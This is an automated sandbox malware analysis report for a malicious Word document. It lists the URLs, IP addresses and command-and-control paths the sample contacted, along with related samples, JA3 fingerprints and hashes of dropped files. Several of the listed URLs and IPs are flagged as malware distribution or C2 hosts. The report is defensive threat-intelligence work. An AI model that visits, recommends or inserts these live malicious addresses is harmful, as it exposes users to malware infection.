https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.css?v=7c | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.roblox.com/develop | svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.odwebp.svc.ms | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://web.microsoftstream.com/video/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://corp.roblox.com/parents/ | svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmp | false | - | high
https://graph.windows.net | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/wp-content/themes/econature/css/fontello.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmp | false | - | high
https://physio-svdh.ch/wp-content/themes/econature/css/retina.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-content/uploads/cmsms_styles/econature.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://gmpg.org/xfn/11 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/ueber-uns/about-us/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/ios | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
http://arquivopop.com.br/index_htm_files/Kxh/ | powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://o365auditrealtimeingestion.manage.office.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://outlook.office365.com/api/v1.0/me/Activities | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/wp-content/themes/econature/css/ie.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/offene-stellen/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/angebot/training-fuer-senioren/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://entitlement.diagnostics.office.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://outlook.office.com/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/angebot/med-trainingstherapie-mtt/ | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-includes/wlwmanifest.xml | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://cairocad.com/cgi-bin/1PBB/ | powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://storage.live.com/clientlogs/uploadlocation | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://www.hulu.com/ca-privacy-rights | svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmp | false | - | high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms | svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmp | false | - | high
https://www.isatechnology.comArAC | powershell.exe, 00000004.00000002.697183346.0000027114743000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreaturamedi | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/xmlrpc.php | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://graph.windows.net/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://devnull.onenote.com | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
http://ownitconsignment.com/files/b/ | powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://physio-svdh.ch/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js?ver=1.19.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://messaging.office.com/ | DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.dr | false | - | high
https://physio-svdh.ch/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js? | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://physio-svdh.ch/wp-content/themes/econature/css/style.css?ver=1.0.0 | powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp | false
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://physio-svdh.ch/comments/feed/powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              high
                                                                                                              https://skyapi.live.net/Activity/DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://physio-svdh.ch/wp-content/plugins/buttonizer-multifunctional-button/assets/frontend.min.js?vpowershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://api.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://physio-svdh.ch/wp-content/themes/econature/css/ilightbox-skins/dark-skin.css?ver=2.2.0powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                high
                                                                                                                https://staging.cortana.aiDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                https://onedrive.live.com/embed?DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                  high
                                                                                                                  https://augloop.office.comDC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drfalse
                                                                                                                    high

Contacted IPs


Public

IP               Domain   Country        ASN    ASN Name                          Malicious
194.209.195.106  unknown  Switzerland    3303   SWISSCOMSwisscomSwitzerlandLtdCH  false
97.120.3.198     unknown  United States  209    CENTURYLINK-US-LEGACY-QWESTUS     true
35.208.182.43    unknown  United States  19527  GOOGLE-2US                        true
70.180.33.202    unknown  United States  22773  ASN-CXA-ALL-CCI-22773-RDCUS       true
50.116.111.59    unknown  United States  46606  UNIFIEDLAYER-AS-1US               true
173.249.20.233   unknown  Germany        51167  CONTABODE                         true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 347028
Start date: 01.02.2021
Start time: 23:24:14
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 49s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: v22Pc0qA.doc.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@16/14@3/7
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 99.9% (good quality ratio 95%)
• Quality average: 79.8%
• Quality standard deviation: 27.5%
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.109.76.68, 52.109.12.24, 104.43.193.48, 51.104.139.180, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129, 8.248.141.254, 8.253.204.249, 8.241.122.254, 8.241.121.254, 8.241.122.126
• Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, europe.configsvc1.live.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time      Type             Description
23:25:14  API Interceptor  44x Sleep call for process: powershell.exe modified
23:25:44  API Interceptor  10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    194.209.195.106v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                      2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                        97.120.3.198EIS-120120 QZC-122220.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/0f5m62spd/kt0d01/
                                                                                                                        Copy invoice #422380.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/xzr508fg58hgt/p8q6sgg9gwgr8rs9/q9cynhg/8dxqwjpu230yl15/
                                                                                                                        9486874.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/91y1l3z4v/xizwgksqrllsyqu/eraoyl9t2wlrof/g8pufykrilt/6brn7fffklsas/q3gkoa/
                                                                                                                        Electronic form.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/w9v9j4zmq7bejeic2e/
                                                                                                                        TZ8322852306TL.docGet hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/do8iadgzwnq3qa9povw/6zdyqngmhmmc69wdpj/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/uvn2j/un8q1/
                                                                                                                        http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/pos89yydi24uxtcmlz6/f631/8x9c2bk8t4r/zorb8/ogci/cggy1evlrwxdj5h/
                                                                                                                        https://dj.4zido.de/i/612BRNn/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/19kj6/g5h9bzym006c7j/43ay3ofpznbzj38/1qfz5tqd3/r5exfcpnarwn4c/6ne8dy3r0jelw2qnbi/
                                                                                                                        http://gluonpharma.com/fonts/W/Get hashmaliciousBrowse
                                                                                                                        • 97.120.3.198/ug9rsi0iq7da8qet86h/jg29c6vldf/6fyvceyue/sfz5vfi4e22/
                                                                                                                        35.208.182.43v22Pc0qA.doc.docGet hashmaliciousBrowse
                                                                                                                          2wUaqWdy.doc.docGet hashmaliciousBrowse
                                                                                                                            GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                              70.180.33.2028wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 70.180.33.202/fln18ojo9upin4s/szxw2xk/75f0/0f66f0gsp71bm7w/
                                                                                                                              50.116.111.59Electronic form.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/p28e7od863phitwqz2s/7roopj5/r6b06xe3e8xmqs8g/9tmo0q2t/i21l8k4/mkj91zepqc0f7n/
                                                                                                                              8wPRuahY1M.dllGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/805kib7/vp5sm5n4p5u7ghz3w9/6ugmso/0sjuxpasi/
                                                                                                                              http://perfumeriarecuerdame.cl/overillustration/lTqyZy8AT7ByAidoAEArFkYch5nVjGFftnZdnv8yqAaPMnENN7URxUqiCu/Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/rd6gz9k388ltevf/r77na/ajzbauvcf2/x5jv1yqwmaas34s/
                                                                                                                              https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/unlfwwzvo3nu/
                                                                                                                              adjunto 86028707-97299.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/gtnp7ctfs63434f509u/vi5pbfhvcpzd6po6u/
                                                                                                                              DOCUMENTO_MEDICO 047.docGet hashmaliciousBrowse
                                                                                                                              • 50.116.111.59:8080/fxj03p8nb/8bxykfnpf63q35rwg/9i1xa3srvbcrspryp/3w4lfheoymirfym/bvyc6d78gbr8o/kb3s02ub1n7cf9/
                                                                                                                              December Invoice.docGet hashmaliciousBrowse
 |  |  | 50.116.111.59:8080/n3wh7cs8bxi/ytxv0cfwhgz/jjzbhmo3jqx9/6wp9z8y66m/g2irzjj1b45ynawfgh/30hz8zv/
 | MH1809380042BB.doc | malicious | 50.116.111.59:8080/1lgocese97nii3al1/vw784nlo3edogtw0m/vsmt1rb3x8n1evlo5/my0x/rds7y7hqjo/1n6ca1ys3f/
 | http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysX | malicious | 50.116.111.59:8080/kno2cm5jwc6m/tgmjzmpq/4jdm7z5y9l1javlg/da51anu0oz08tnv458/nzrpbfoaduoh4bi/
 | Nf3m8s.dll | malicious | 50.116.111.59:8080/20c0m7wf00/
 | https://upinsmokebatonrouge.com/var/kZKk4S0XnGUwc0OKsia1/ | malicious | 50.116.111.59:8080/q3ikxf8rlo0rwmkk/
 | GT-9333 Medical report COVID-19.doc | malicious | 50.116.111.59:8080/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/
 | 2G18HC8998F36.doc | malicious | 50.116.111.59:8080/f0ttde5p/6pa3fz7e/35ronnbuwllcs3rpomc/

Domains

Match | Associated Sample Name / URL | Detection | Context
physio-svdh.ch | v22Pc0qA.doc.doc | malicious | 194.209.195.106
 | 2wUaqWdy.doc.doc | malicious | 194.209.195.106

ASN

Match | Associated Sample Name / URL | Detection | Context
SWISSCOM (Swisscom Switzerland Ltd, CH) | v22Pc0qA.doc.doc | malicious | 194.209.195.106
 | 2wUaqWdy.doc.doc | malicious | 194.209.195.106
 | SKM_C258201001130020005057.exe | malicious | 46.14.214.245
 | SKM_C258201001130020005057.exe | malicious | 46.14.214.245
 | Mozi.m | malicious | 178.194.165.28
 | NormhjTcQb.exe | malicious | 212.243.31.234
 | pty10 | malicious | 217.193.254.91
 | Astra.x86 | malicious | 85.0.156.99
 | https://aplusserve.com/wp-content/plugins/antara/failed/encr-p-t-e-d/?email=maggiemk.wong@juliusbaer.com | malicious | 193.223.56.121
 | AWD1-2001028L PI.exe | malicious | 194.209.228.166
 | SWIFT COPY (2).exe | malicious | 194.209.228.166
 | ipz.exe | malicious | 188.61.89.227
 | newage | malicious | 195.144.41.204
 | 7v1ic5IS8I | malicious | 164.206.111.135
 | miori.x86 | malicious | 178.196.83.123
 | UnHAnaAW.x86 | malicious | 178.192.36.116
 | Mozi.a | malicious | 213.3.4.52
 | WE3A0yB3kl | malicious | 85.1.224.116
 | IpvLye.arm7 | malicious | 178.195.108.154
 | whoareyou.mips | malicious | 178.198.75.41
GOOGLE-2 (US) | v22Pc0qA.doc.doc | malicious | 35.208.153.170
 | 2wUaqWdy.doc.doc | malicious | 35.208.153.170
 | INFO_2020.doc | malicious | 35.208.69.64
 | REMITTANCE ADVICE REF0000360261_PDF.xlsx | malicious | 35.214.170.96
 | gDvIZEJQF2.xls | malicious | 35.214.243.127
 | 68254_2001.doc | malicious | 35.209.96.32
 | IMG-11862.doc | malicious | 35.208.61.46
 | ARCHIVOFile-20-012021.doc | malicious | 35.209.96.32
 | Calculation-380472272-01262021.xlsm | malicious | 35.208.103.169
 | 453690-3012-QZS-9120501.doc | malicious | 35.214.159.46
 | MPbBCArHPF.exe | malicious | 35.208.174.213
 | TBKK E12101010.xlsx | malicious | 35.208.174.213
 | ARCH-SO-930373.doc | malicious | 35.209.96.32
 | Info_C_780929.doc | malicious | 35.214.159.46
 | Factura.doc | malicious | 35.209.114.34
 | DAT 30 122020 664_16167.doc | malicious | 35.214.159.46
 | Beauftragung.doc | malicious | 35.209.114.34
 | sample2.doc | malicious | 35.214.199.246
 | 55-2912.doc | malicious | 35.209.78.196
 | DAT_G_0259067.doc | malicious | 35.214.169.246
CENTURYLINK-US-LEGACY-QWEST (US) | davay.exe | malicious | 174.18.23.49
 | oHqMFmPndx.exe | malicious | 67.232.238.125
 | mssecsvc.exe | malicious | 162.19.200.18
 | fil1 | malicious | 184.6.30.51
 | 8wPRuahY1M.dll | malicious | 97.120.3.198
 | i | malicious | 63.224.11.107
 | svchost.exe | malicious | 69.68.63.158
 | http://167.248.133.20 | malicious | 167.248.133.20
 | EIS-120120 QZC-122220.doc | malicious | 97.120.3.198
 | Copy invoice #422380.doc | malicious | 97.120.3.198
 | 9486874.doc | malicious | 97.120.3.198
 | Electronic form.doc | malicious | 97.120.3.198
 | TZ8322852306TL.doc | malicious | 97.120.3.198
 | http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/ | malicious | 97.120.3.198
 | http://www.appdailyhunt.com/alfasymlink/O1m92JJ5CJWxojdaFgjPcIrL/ | malicious | 97.120.3.198
 | https://dj.4zido.de/i/612BRNn/ | malicious | 97.120.3.198
 | http://gluonpharma.com/fonts/W/ | malicious | 97.120.3.198
 | fdwv4hWF1M.exe | malicious | 75.162.127.230
 | bdOPjE89ck.dll | malicious | 72.165.68.237
 | http://167.248.133.24 | malicious | 167.248.133.24

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
3b5074b1b5d032e5620f69f9f700ff0e | OOLU2115327710.xls.exe | malicious | 194.209.195.106, 35.208.182.43
 | ITM inspection time change.exe | malicious | 194.209.195.106, 35.208.182.43
 | shipping document.exe | malicious | 194.209.195.106, 35.208.182.43
 | forderung.pdf.exe | malicious | 194.209.195.106, 35.208.182.43
 | ROM_Files_939964.exe | malicious | 194.209.195.106, 35.208.182.43
 | bLupWqls5l.exe | malicious | 194.209.195.106, 35.208.182.43
 | Payment Receipt.exe | malicious | 194.209.195.106, 35.208.182.43
 | UQtGj1Yzlf.exe | malicious | 194.209.195.106, 35.208.182.43
 | INV-FACTUUR00921.xlsx | malicious | 194.209.195.106, 35.208.182.43
 | 6729001591617.exe | malicious | 194.209.195.106, 35.208.182.43
 | tQdHht8Bwc.exe | malicious | 194.209.195.106, 35.208.182.43
 | SecuriteInfo.com.Trojan.PackedNET.471.11170.exe | malicious | 194.209.195.106, 35.208.182.43
 | ttrpym.exe | malicious | 194.209.195.106, 35.208.182.43
 | roboforex4multisetup.exe | malicious | 194.209.195.106, 35.208.182.43
 | MV TAN BINH 135.pdf.exe | malicious | 194.209.195.106, 35.208.182.43
 | SecuriteInfo.com.Variant.Zusy.363976.7571.exe | malicious | 194.209.195.106, 35.208.182.43
 | SecuriteInfo.com.Trojan.PackedNET.519.21836.exe | malicious | 194.209.195.106, 35.208.182.43
 | RFQ RPM202011-776JD.jpg.lnk | malicious | 194.209.195.106, 35.208.182.43
 | 8Aobnx1VRi.exe | malicious | 194.209.195.106, 35.208.182.43
 | RFQ-Strip Casting Line.exe | malicious | 194.209.195.106, 35.208.182.43

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DC97C0E2-E492-4CE8-9253-DB063F2B7EA0
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 132920
Entropy (8bit): 5.373078821495444
Encrypted: false
SSDEEP: 1536:CcQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:irQ9DQW+zBX8P
MD5: 389C1461181EDC4905029C5E88D35AA2
SHA1: 3E61E8C9A9739C2D53D7610C129047C5B332BBCC
SHA-256: C967124C561BD6E97DE925820D6CE8B20C64B913D1E343AEFB80FCD9EF96075A
SHA-512: 74903A87EF4AB07D39F4E4DBCA642CEC14DDC9CA199A8559B710A55B10D0A92F6775202CF46E419213FE3B690CF660A5ADE38A5C1550410A5695112633E6D551
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-01T22:25:05">.. Build: 16.0.13731.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{179EC3B7-37E0-4560-80F5-16F3BFE059F5}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{87200191-4D4F-4DCD-B181-904D5E386871}.tmp
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.3643824618899223
Encrypted: false
SSDEEP: 6:Iiiiiiiiii8l+4V/Nc8++ldL61DX6tD6pV2E6qn:23dNG+PmBqZ6pV2pq
MD5: 9731171E08A44D90DD005A586825086B
SHA1: FB904928494B5B3FEA79A40B4A6CA2F819790C25
SHA-256: 7C33C462A36BAAB96EB896B42428B656C709D767B9C870ED47A2191B2A4B663C
SHA-512: 4E689228FB0305952F5B8C4835B6F8D00F831B192AED6FD2F8EA0A7C3AD569A98428C2D74B3A7CD02A3B5F468FA0DF1B8DECA4F1F36BB6D8C44590CF4C5C74D5
Malicious: false
Reputation: low
Preview: ..(...(...(...(...(...(...(...(...(...(...(...p.r.a.t.e.s.h...p....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......>...B...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 1196
Entropy (8bit): 5.33361024576829
Encrypted: false
SSDEEP: 24:3aZPpQrLAo4KAxX5qRPD42HrCvKLoFe9tCKnKJF9iq:qZPerB4nqRL/HrCvjFe9tC4anv
MD5: 3C95F06BAE25D8883754A9886A484998
SHA1: 74684406A7FE82F6476D5D9C9AA63E075871A80E
SHA-256: 9434B071A928518B9A14B79C07F4AD49F00E0E921C4FD868A4D8168E7ABFF938
SHA-512: 32B51A03132B3CD0566A0B15A792C5E94729EB272238803B9E01A79487794FCB8B8EEE9F3284EDDE7AA4DE28F782DE6C5016E228DAD284E7F91F7D05AF6108DE
Malicious: false
